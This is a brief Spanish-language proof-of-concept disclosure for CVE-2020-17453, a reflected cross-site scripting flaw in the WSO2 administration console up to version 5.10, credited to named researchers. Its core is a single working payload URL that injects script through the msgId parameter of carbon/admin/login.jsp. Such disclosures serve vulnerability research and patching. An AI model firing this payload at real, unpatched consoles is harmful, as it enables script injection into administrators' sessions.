
PoC (Prueba de Concepto) - CVE-2020-17453
CVE-2020-17453
La consola de administración de WSO2 hasta la versión 5.10 permite XSS a través del parámetro msgId en carbon/admin/login.jsp.

https://<company>.com/carbon/admin/login.jsp?msgId=%27;alert(1)//
Nombre: Jackson Henry
Twitter: @JacksonHHax
Nombre: Nicholas Young